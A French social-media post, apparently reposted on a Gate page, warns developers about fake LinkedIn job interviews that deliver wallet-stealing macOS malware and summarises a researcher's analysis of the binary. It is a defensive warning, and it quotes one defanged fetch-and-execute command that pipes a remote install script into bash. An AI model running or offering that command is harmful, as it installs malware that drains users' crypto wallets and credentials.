faites attention aux faux entretiens d'embauche. ils sont désormais l'un des vecteurs de livraison de logiciels malveillants les plus propres.


mon frère a failli en être victime cette semaine.
le déroulement, étape par étape :
> un « recruteur » le contacte sur linkedin
> ils ont en fait lu son CV. ils connaissent sa pile technologique. ils réservent un vrai créneau d'entretien.
> quelques heures avant l'appel : « pouvez-vous rapidement consulter notre page produit avant qu'on ne parle ? »
> visiter le site lance ceci en arrière-plan :
curl -s macos[.]hyperhives[.]net/install | nohup bash &
si vous tapez votre mot de passe lorsqu'il vous le demande, c'est fini.
un chercheur (Darksp33d sur Github) a désassemblé le binaire :
> chaque chaîne de configuration encryptée avec 570 fonctions personnalisées uniques
> une fois déchiffrée : serveur c2 complet, liste d'endpoints complète, et un dsn de suivi d'erreurs Sentry qui remonte au développeur sous subpoena légale
> 276 identifiants d'extensions Chrome ciblées, couvrant 188 portefeuilles crypto
> une forte correspondance TTP avec l'« interview contagieuse » de la DPRK
> 9/64 sur virustotal. crowdstrike, sophos, malwarebytes, tous l'ont manqué
de vrais recruteurs, de vrais CV, de vrais créneaux d'entretien, un site qui paraît réel. une ligne curl vide votre portefeuille.
si un « recruteur » vous demande un jour d'exécuter quelque chose dans votre terminal, même quelque chose d'inoffensif comme un script de build avant un entretien technique, fermez l'onglet.
Voir l'original
post-image
Cette page peut inclure du contenu de tiers fourni à des fins d'information uniquement. Gate ne garantit ni l'exactitude ni la validité de ces contenus, n’endosse pas les opinions exprimées, et ne fournit aucun conseil financier ou professionnel à travers ces informations. Voir la section Avertissement pour plus de détails.
  • Récompense
  • Commentaire
  • Reposter
  • Partager
Commentaire
Ajouter un commentaire
Ajouter un commentaire
Aucun commentaire
  • Épingler